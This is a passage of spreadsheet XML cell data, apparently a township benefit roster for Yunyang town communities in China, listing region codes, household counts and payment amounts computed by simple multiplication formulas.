      <c r="K1771" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1772" ht="23" customHeight="1" spans="1:11">
      <c r="A1772" s="13" t="s">
        <v>4719</v>
      </c>
      <c r="B1772" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1772" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1772" s="14" t="s">
        <v>4720</v>
      </c>
      <c r="E1772" s="14" t="s">
        <v>3776</v>
      </c>
      <c r="F1772" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1772" s="14">
        <v>1</v>
      </c>
      <c r="H1772" s="14">
        <v>340</v>
      </c>
      <c r="I1772" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1772" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1772" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1773" ht="23" customHeight="1" spans="1:11">
      <c r="A1773" s="13" t="s">
        <v>4721</v>
      </c>
      <c r="B1773" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1773" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1773" s="14" t="s">
        <v>4722</v>
      </c>
      <c r="E1773" s="14" t="s">
        <v>2923</v>
      </c>
      <c r="F1773" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1773" s="14">
        <v>1</v>
      </c>
      <c r="H1773" s="14">
        <v>340</v>
      </c>
      <c r="I1773" s="14">
        <f t="shared" si="95"/>
        <v>340</v>
      </c>
      <c r="J1773" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1773" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1774" ht="23" customHeight="1" spans="1:11">
      <c r="A1774" s="13" t="s">
        <v>4723</v>
      </c>
      <c r="B1774" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1774" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1774" s="14" t="s">
        <v>4724</v>
      </c>
      <c r="E1774" s="14" t="s">
        <v>3609</v>
      </c>
      <c r="F1774" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1774" s="14">
        <v>3</v>
      </c>
      <c r="H1774" s="14">
        <v>265</v>
      </c>
      <c r="I1774" s="14">
        <f t="shared" si="95"/>
        <v>795</v>
      </c>
      <c r="J1774" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1774" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1775" ht="23" customHeight="1" spans="1:11">
      <c r="A1775" s="13" t="s">
        <v>4725</v>
      </c>
      <c r="B1775" s="14" t="str">
        <f>B1774</f>
        <v>云阳镇</v>
      </c>
      <c r="C1775" s="14" t="str">
        <f>C1774</f>
        <v>云钢社区</v>
      </c>
      <c r="D1775" s="27" t="s">
        <v>4726</v>
      </c>
      <c r="E1775" s="27" t="s">
        <v>3969</v>
      </c>
      <c r="F1775" s="14" t="str">
        <f>F1774</f>
        <v>4113210599</v>
      </c>
      <c r="G1775" s="14"/>
      <c r="H1775" s="14"/>
      <c r="I1775" s="14"/>
      <c r="J1775" s="14"/>
      <c r="K1775" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1776" ht="23" customHeight="1" spans="1:11">
      <c r="A1776" s="13" t="s">
        <v>4727</v>
      </c>
      <c r="B1776" s="14" t="str">
        <f>B1775</f>
        <v>云阳镇</v>
      </c>
      <c r="C1776" s="14" t="str">
        <f>C1775</f>
        <v>云钢社区</v>
      </c>
      <c r="D1776" s="46" t="s">
        <v>4728</v>
      </c>
      <c r="E1776" s="27" t="s">
        <v>4729</v>
      </c>
      <c r="F1776" s="14" t="str">
        <f>F1775</f>
        <v>4113210599</v>
      </c>
      <c r="G1776" s="14"/>
      <c r="H1776" s="14"/>
      <c r="I1776" s="14"/>
      <c r="J1776" s="14"/>
      <c r="K1776" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1777" ht="23" customHeight="1" spans="1:11">
      <c r="A1777" s="13" t="s">
        <v>4730</v>
      </c>
      <c r="B1777" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1777" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1777" s="14" t="s">
        <v>4731</v>
      </c>
      <c r="E1777" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1777" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1777" s="14">
        <v>1</v>
      </c>
      <c r="H1777" s="14">
        <v>340</v>
      </c>
      <c r="I1777" s="14">
        <f t="shared" ref="I1777:I1784" si="96">H1777*G1777</f>
        <v>340</v>
      </c>
      <c r="J1777" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1777" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1778" ht="23" customHeight="1" spans="1:11">
      <c r="A1778" s="13" t="s">
        <v>4732</v>
      </c>
      <c r="B1778" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1778" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1778" s="14" t="s">
        <v>4733</v>
      </c>
      <c r="E1778" s="14" t="s">
        <v>4734</v>
      </c>
      <c r="F1778" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1778" s="14">
        <v>1</v>
      </c>
      <c r="H1778" s="14">
        <v>340</v>
      </c>
      <c r="I1778" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1778" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1778" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1779" ht="23" customHeight="1" spans="1:11">
      <c r="A1779" s="13" t="s">
        <v>4735</v>
      </c>
      <c r="B1779" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1779" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1779" s="14" t="s">
        <v>4736</v>
      </c>
      <c r="E1779" s="14" t="s">
        <v>4737</v>
      </c>
      <c r="F1779" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1779" s="14">
        <v>1</v>
      </c>
      <c r="H1779" s="14">
        <v>340</v>
      </c>
      <c r="I1779" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1779" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1779" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1780" ht="23" customHeight="1" spans="1:11">
      <c r="A1780" s="13" t="s">
        <v>4738</v>
      </c>
      <c r="B1780" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1780" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1780" s="14" t="s">
        <v>4739</v>
      </c>
      <c r="E1780" s="14" t="s">
        <v>4740</v>
      </c>
      <c r="F1780" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1780" s="14">
        <v>1</v>
      </c>
      <c r="H1780" s="14">
        <v>340</v>
      </c>
      <c r="I1780" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1780" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1780" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1781" ht="23" customHeight="1" spans="1:11">
      <c r="A1781" s="13" t="s">
        <v>4741</v>
      </c>
      <c r="B1781" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1781" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1781" s="14" t="s">
        <v>4742</v>
      </c>
      <c r="E1781" s="14" t="s">
        <v>4743</v>
      </c>
      <c r="F1781" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1781" s="14">
        <v>1</v>
      </c>
      <c r="H1781" s="14">
        <v>340</v>
      </c>
      <c r="I1781" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1781" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1781" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1782" ht="23" customHeight="1" spans="1:11">
      <c r="A1782" s="13" t="s">
        <v>4744</v>
      </c>
      <c r="B1782" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1782" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1782" s="14" t="s">
        <v>4745</v>
      </c>
      <c r="E1782" s="14" t="s">
        <v>4497</v>
      </c>
      <c r="F1782" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1782" s="14">
        <v>1</v>
      </c>
      <c r="H1782" s="14">
        <v>340</v>
      </c>
      <c r="I1782" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1782" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1782" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1783" ht="23" customHeight="1" spans="1:11">
      <c r="A1783" s="13" t="s">
        <v>4746</v>
      </c>
      <c r="B1783" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1783" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1783" s="14" t="s">
        <v>4747</v>
      </c>
      <c r="E1783" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1783" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1783" s="14">
        <v>1</v>
      </c>
      <c r="H1783" s="14">
        <v>340</v>
      </c>
      <c r="I1783" s="14">
        <f t="shared" si="96"/>
        <v>340</v>
      </c>
      <c r="J1783" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1783" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1784" ht="23" customHeight="1" spans="1:11">
      <c r="A1784" s="13" t="s">
        <v>4748</v>
      </c>
      <c r="B1784" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1784" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1784" s="14" t="s">
        <v>4749</v>
      </c>
      <c r="E1784" s="14" t="s">
        <v>4750</v>
      </c>
      <c r="F1784" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1784" s="14">
        <v>2</v>
      </c>
      <c r="H1784" s="14">
        <v>300</v>
      </c>
      <c r="I1784" s="14">
        <f t="shared" si="96"/>
        <v>600</v>
      </c>
      <c r="J1784" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1784" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1785" ht="23" customHeight="1" spans="1:11">
      <c r="A1785" s="13" t="s">
        <v>4752</v>
      </c>
      <c r="B1785" s="14" t="str">
        <f>B1784</f>
        <v>云阳镇</v>
      </c>
      <c r="C1785" s="14" t="str">
        <f>C1784</f>
        <v>老城社区</v>
      </c>
      <c r="D1785" s="47" t="s">
        <v>4753</v>
      </c>
      <c r="E1785" s="48" t="s">
        <v>4754</v>
      </c>
      <c r="F1785" s="14" t="str">
        <f>F1784</f>
        <v>4113210523</v>
      </c>
      <c r="G1785" s="14"/>
      <c r="H1785" s="14"/>
      <c r="I1785" s="14"/>
      <c r="J1785" s="14"/>
      <c r="K1785" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1786" ht="23" customHeight="1" spans="1:11">
      <c r="A1786" s="13" t="s">
        <v>4755</v>
      </c>
      <c r="B1786" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1786" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1786" s="14" t="s">
        <v>4756</v>
      </c>
      <c r="E1786" s="14" t="s">
        <v>4757</v>
      </c>
      <c r="F1786" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1786" s="14">
        <v>2</v>
      </c>
      <c r="H1786" s="14">
        <v>300</v>
      </c>
      <c r="I1786" s="14">
        <f>H1786*G1786</f>
        <v>600</v>
      </c>
      <c r="J1786" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1786" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1787" ht="23" customHeight="1" spans="1:11">
      <c r="A1787" s="13" t="s">
        <v>4758</v>
      </c>
      <c r="B1787" s="14" t="str">
        <f>B1786</f>
        <v>云阳镇</v>
      </c>
      <c r="C1787" s="14" t="str">
        <f>C1786</f>
        <v>老城社区</v>
      </c>
      <c r="D1787" s="49" t="s">
        <v>4759</v>
      </c>
      <c r="E1787" s="50" t="s">
        <v>4760</v>
      </c>
      <c r="F1787" s="14" t="str">
        <f>F1786</f>
        <v>4113210523</v>
      </c>
      <c r="G1787" s="14"/>
      <c r="H1787" s="14"/>
      <c r="I1787" s="14"/>
      <c r="J1787" s="14"/>
      <c r="K1787" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1788" ht="23" customHeight="1" spans="1:11">
      <c r="A1788" s="13" t="s">
        <v>4761</v>
      </c>
      <c r="B1788" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1788" s="14" t="s">
        <v>4762</v>
      </c>
      <c r="D1788" s="14" t="s">
        <v>4763</v>
      </c>
      <c r="E1788" s="14" t="s">
        <v>4539</v>
      </c>
      <c r="F1788" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1788" s="14">
        <v>3</v>
      </c>
      <c r="H1788" s="14">
        <v>295</v>
      </c>
      <c r="I1788" s="14">
        <f>H1788*G1788</f>
        <v>885</v>
      </c>
      <c r="J1788" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1788" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1789" ht="23" customHeight="1" spans="1:11">
      <c r="A1789" s="13" t="s">
        <v>4764</v>
      </c>
      <c r="B1789" s="14" t="str">
        <f>B1788</f>
        <v>云阳镇</v>
      </c>
      <c r="C1789" s="14" t="str">
        <f>C1788</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1789" s="47" t="s">
        <v>4765</v>
      </c>
      <c r="E1789" s="48" t="s">
        <v>3769</v>
      </c>
      <c r="F1789" s="14" t="str">
        <f>F1788</f>
        <v>4113210521</v>
      </c>
      <c r="G1789" s="14"/>
      <c r="H1789" s="14"/>
      <c r="I1789" s="14"/>
      <c r="J1789" s="14"/>
      <c r="K1789" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1790" ht="23" customHeight="1" spans="1:11">
      <c r="A1790" s="13" t="s">
        <v>4766</v>
      </c>
      <c r="B1790" s="14" t="str">
        <f>B1789</f>
        <v>云阳镇</v>
      </c>
      <c r="C1790" s="14" t="str">
        <f>C1789</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1790" s="51" t="s">
        <v>4767</v>
      </c>
      <c r="E1790" s="52" t="s">
        <v>3760</v>
      </c>
      <c r="F1790" s="14" t="str">
        <f>F1789</f>
        <v>4113210521</v>
      </c>
      <c r="G1790" s="14"/>
      <c r="H1790" s="14"/>
      <c r="I1790" s="14"/>
      <c r="J1790" s="14"/>
      <c r="K1790" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1791" ht="23" customHeight="1" spans="1:11">
      <c r="A1791" s="13" t="s">
        <v>4768</v>
      </c>
      <c r="B1791" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1791" s="14" t="s">
        <v>4769</v>
      </c>
      <c r="D1791" s="14" t="s">
        <v>4770</v>
      </c>
      <c r="E1791" s="14" t="s">
        <v>4771</v>
      </c>
      <c r="F1791" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1791" s="14">
        <v>1</v>
      </c>
      <c r="H1791" s="14">
        <v>340</v>
      </c>
      <c r="I1791" s="14">
        <f>H1791*G1791</f>
        <v>340</v>
      </c>
      <c r="J1791" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1791" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1792" ht="23" customHeight="1" spans="1:11">
      <c r="A1792" s="13" t="s">
        <v>4772</v>
      </c>
      <c r="B1792" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1792" s="14" t="s">
        <v>4773</v>
      </c>
      <c r="D1792" s="14" t="s">
        <v>4774</v>
      </c>
      <c r="E1792" s="14" t="s">
        <v>4775</v>
      </c>
      <c r="F1792" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1792" s="14">
        <v>1</v>
      </c>
      <c r="H1792" s="14">
        <v>340</v>
      </c>
      <c r="I1792" s="14">
        <f>H1792*G1792</f>
        <v>340</v>
      </c>
      <c r="J1792" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1792" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1793" ht="23" customHeight="1" spans="1:11">
      <c r="A1793" s="13" t="s">
        <v>4776</v>
      </c>
      <c r="B1793" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1793" s="14" t="s">
        <v>4777</v>
      </c>
      <c r="D1793" s="14" t="s">
        <v>4778</v>
      </c>
      <c r="E1793" s="14" t="s">
        <v>3969</v>
      </c>
      <c r="F1793" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1793" s="14">
        <v>1</v>
      </c>
      <c r="H1793" s="14">
        <v>340</v>
      </c>
      <c r="I1793" s="14">
        <f>H1793*G1793</f>
        <v>340</v>
      </c>
      <c r="J1793" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1793" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1794" ht="23" customHeight="1" spans="1:11">
      <c r="A1794" s="13" t="s">
        <v>4779</v>
      </c>
      <c r="B1794" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1794" s="14" t="s">
        <v>4773</v>
      </c>
      <c r="D1794" s="14" t="s">
        <v>4780</v>
      </c>
      <c r="E1794" s="14" t="s">
        <v>4781</v>
      </c>
      <c r="F1794" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1794" s="14">
        <v>2</v>
      </c>
      <c r="H1794" s="14">
        <v>300</v>
      </c>
      <c r="I1794" s="14">
        <f>H1794*G1794</f>
        <v>600</v>
      </c>
      <c r="J1794" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1794" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1795" ht="23" customHeight="1" spans="1:11">
      <c r="A1795" s="13" t="s">
        <v>4782</v>
      </c>
      <c r="B1795" s="14" t="str">
        <f>B1794</f>
        <v>云阳镇</v>
      </c>
      <c r="C1795" s="14" t="str">
        <f>C1794</f>
        <v>小关居委会二组</v>
      </c>
      <c r="D1795" s="47" t="s">
        <v>4783</v>
      </c>
      <c r="E1795" s="48" t="s">
        <v>4784</v>
      </c>
      <c r="F1795" s="14" t="str">
        <f>F1794</f>
        <v>4113210521</v>
      </c>
      <c r="G1795" s="14"/>
      <c r="H1795" s="14"/>
      <c r="I1795" s="14"/>
      <c r="J1795" s="14"/>
      <c r="K1795" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1796" ht="23" customHeight="1" spans="1:11">
      <c r="A1796" s="13" t="s">
        <v>4785</v>
      </c>
      <c r="B1796" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1796" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1796" s="14" t="s">
        <v>4786</v>
      </c>
      <c r="E1796" s="14" t="s">
        <v>4787</v>
      </c>
      <c r="F1796" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1796" s="14">
        <v>1</v>
      </c>
      <c r="H1796" s="14">
        <v>340</v>
      </c>
      <c r="I1796" s="14">
        <f t="shared" ref="I1796:I1803" si="97">H1796*G1796</f>
        <v>340</v>
      </c>
      <c r="J1796" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1796" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1797" ht="23" customHeight="1" spans="1:11">
      <c r="A1797" s="13" t="s">
        <v>4788</v>
      </c>
      <c r="B1797" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1797" s="14" t="s">
        <v>4762</v>
      </c>
      <c r="D1797" s="14" t="s">
        <v>4789</v>
      </c>
      <c r="E1797" s="14" t="s">
        <v>4698</v>
      </c>
      <c r="F1797" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1797" s="14">
        <v>1</v>
      </c>
      <c r="H1797" s="14">
        <v>340</v>
      </c>
      <c r="I1797" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1797" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1797" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1798" ht="23" customHeight="1" spans="1:11">
      <c r="A1798" s="13" t="s">
        <v>4790</v>
      </c>
      <c r="B1798" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1798" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1798" s="14" t="s">
        <v>4791</v>
      </c>
      <c r="E1798" s="14" t="s">
        <v>4792</v>
      </c>
      <c r="F1798" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1798" s="14">
        <v>1</v>
      </c>
      <c r="H1798" s="14">
        <v>340</v>
      </c>
      <c r="I1798" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1798" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K1798" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1799" ht="23" customHeight="1" spans="1:11">
      <c r="A1799" s="13" t="s">
        <v>4793</v>
      </c>
      <c r="B1799" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1799" s="14" t="s">
        <v>4794</v>
      </c>
      <c r="D1799" s="14" t="s">
        <v>4795</v>
      </c>
      <c r="E1799" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F1799" s="14" t="s">
        <v>4796</v>
      </c>
      <c r="G1799" s="14">
        <v>1</v>
      </c>
      <c r="H1799" s="14">
        <v>340</v>
      </c>
      <c r="I1799" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1799" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1799" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1800" ht="23" customHeight="1" spans="1:11">
      <c r="A1800" s="13" t="s">
        <v>4798</v>
      </c>
      <c r="B1800" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1800" s="14" t="s">
        <v>4307</v>
      </c>
      <c r="D1800" s="14" t="s">
        <v>4799</v>
      </c>
      <c r="E1800" s="14" t="s">
        <v>4800</v>
      </c>
      <c r="F1800" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1800" s="14">
        <v>1</v>
      </c>
      <c r="H1800" s="14">
        <v>340</v>
      </c>
      <c r="I1800" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1800" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1800" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1801" ht="23" customHeight="1" spans="1:11">
      <c r="A1801" s="13" t="s">
        <v>4801</v>
      </c>
      <c r="B1801" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1801" s="14" t="s">
        <v>4802</v>
      </c>
      <c r="D1801" s="14" t="s">
        <v>4803</v>
      </c>
      <c r="E1801" s="14" t="s">
        <v>3692</v>
      </c>
      <c r="F1801" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1801" s="14">
        <v>1</v>
      </c>
      <c r="H1801" s="14">
        <v>340</v>
      </c>
      <c r="I1801" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1801" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1801" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1802" ht="23" customHeight="1" spans="1:11">
      <c r="A1802" s="13" t="s">
        <v>4804</v>
      </c>
      <c r="B1802" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1802" s="14" t="s">
        <v>4802</v>
      </c>
      <c r="D1802" s="14" t="s">
        <v>4805</v>
      </c>
      <c r="E1802" s="14" t="s">
        <v>3972</v>
      </c>
      <c r="F1802" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1802" s="14">
        <v>1</v>
      </c>
      <c r="H1802" s="14">
        <v>340</v>
      </c>
      <c r="I1802" s="14">
        <f t="shared" si="97"/>
        <v>340</v>
      </c>
      <c r="J1802" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1802" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1803" ht="23" customHeight="1" spans="1:11">
      <c r="A1803" s="13" t="s">
        <v>4806</v>
      </c>
      <c r="B1803" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1803" s="14" t="s">
        <v>4802</v>
      </c>
      <c r="D1803" s="14" t="s">
        <v>4807</v>
      </c>
      <c r="E1803" s="14" t="s">
        <v>4808</v>
      </c>
      <c r="F1803" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1803" s="14">
        <v>2</v>
      </c>
      <c r="H1803" s="14">
        <v>300</v>
      </c>
      <c r="I1803" s="14">
        <f t="shared" si="97"/>
        <v>600</v>
      </c>
      <c r="J1803" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1803" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1804" ht="23" customHeight="1" spans="1:11">
      <c r="A1804" s="13" t="s">
        <v>4809</v>
      </c>
      <c r="B1804" s="14" t="str">
        <f>B1803</f>
        <v>云阳镇</v>
      </c>
      <c r="C1804" s="14" t="str">
        <f>C1803</f>
        <v>南召店村袁庄组</v>
      </c>
      <c r="D1804" s="53" t="s">
        <v>4810</v>
      </c>
      <c r="E1804" s="53" t="s">
        <v>4811</v>
      </c>
      <c r="F1804" s="14" t="str">
        <f>F1803</f>
        <v>4113210519</v>
      </c>
      <c r="G1804" s="14"/>
      <c r="H1804" s="14"/>
      <c r="I1804" s="14"/>
      <c r="J1804" s="14"/>
      <c r="K1804" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1805" ht="23" customHeight="1" spans="1:11">
      <c r="A1805" s="13" t="s">
        <v>4812</v>
      </c>
      <c r="B1805" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1805" s="14" t="s">
        <v>4762</v>
      </c>
      <c r="D1805" s="14" t="s">
        <v>4813</v>
      </c>
      <c r="E1805" s="14" t="s">
        <v>3916</v>
      </c>
      <c r="F1805" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1805" s="14">
        <v>1</v>
      </c>
      <c r="H1805" s="14">
        <v>340</v>
      </c>
      <c r="I1805" s="14">
        <f>H1805*G1805</f>
        <v>340</v>
      </c>
      <c r="J1805" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1805" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1806" ht="23" customHeight="1" spans="1:11">
      <c r="A1806" s="13" t="s">
        <v>4814</v>
      </c>
      <c r="B1806" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1806" s="14" t="s">
        <v>4815</v>
      </c>
      <c r="D1806" s="14" t="s">
        <v>4816</v>
      </c>
      <c r="E1806" s="14" t="s">
        <v>1160</v>
      </c>
      <c r="F1806" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1806" s="14">
        <v>2</v>
      </c>
      <c r="H1806" s="14">
        <v>300</v>
      </c>
      <c r="I1806" s="14">
        <f>H1806*G1806</f>
        <v>600</v>
      </c>
      <c r="J1806" s="14" t="s">
        <v>4797</v>
      </c>
      <c r="K1806" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1807" ht="23" customHeight="1" spans="1:11">
      <c r="A1807" s="13" t="s">
        <v>4817</v>
      </c>
      <c r="B1807" s="14" t="str">
        <f>B1806</f>
        <v>云阳镇</v>
      </c>
      <c r="C1807" s="14" t="str">
        <f>C1806</f>
        <v>小关居委会</v>
      </c>
      <c r="D1807" s="54" t="s">
        <v>4818</v>
      </c>
      <c r="E1807" s="55" t="s">
        <v>4819</v>
      </c>
      <c r="F1807" s="14" t="str">
        <f>F1806</f>
        <v>4113210521</v>
      </c>
      <c r="G1807" s="14"/>
      <c r="H1807" s="14"/>
      <c r="I1807" s="14"/>
      <c r="J1807" s="14"/>
      <c r="K1807" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1808" ht="23" customHeight="1" spans="1:11">
      <c r="A1808" s="13" t="s">
        <v>4820</v>
      </c>
      <c r="B1808" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1808" s="14" t="s">
        <v>4777</v>
      </c>
      <c r="D1808" s="14" t="s">
        <v>4821</v>
      </c>
      <c r="E1808" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1808" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1808" s="14">
        <v>1</v>
      </c>
      <c r="H1808" s="14">
        <v>340</v>
      </c>
      <c r="I1808" s="14">
        <f>H1808*G1808</f>
        <v>340</v>
      </c>
      <c r="J1808" s="14" t="s">
        <v>4822</v>
      </c>
      <c r="K1808" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1809" ht="23" customHeight="1" spans="1:11">
      <c r="A1809" s="13" t="s">
        <v>4823</v>
      </c>
      <c r="B1809" s="56" t="s">
        <v>3669</v>
      </c>
      <c r="C1809" s="56" t="s">
        <v>4777</v>
      </c>
      <c r="D1809" s="56" t="s">
        <v>4824</v>
      </c>
      <c r="E1809" s="56" t="s">
        <v>2632</v>
      </c>
      <c r="F1809" s="56" t="s">
        <v>3673</v>
      </c>
      <c r="G1809" s="56">
        <v>2</v>
      </c>
      <c r="H1809" s="56">
        <v>320</v>
      </c>
      <c r="I1809" s="56">
        <f>H1809*G1809</f>
        <v>640</v>
      </c>
      <c r="J1809" s="56" t="s">
        <v>4822</v>
      </c>
      <c r="K1809" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1810" ht="23" customHeight="1" spans="1:11">
      <c r="A1810" s="13" t="s">
        <v>4825</v>
      </c>
      <c r="B1810" s="14" t="str">
        <f>B1809</f>
        <v>云阳镇</v>
      </c>
      <c r="C1810" s="14" t="str">
        <f>C1809</f>
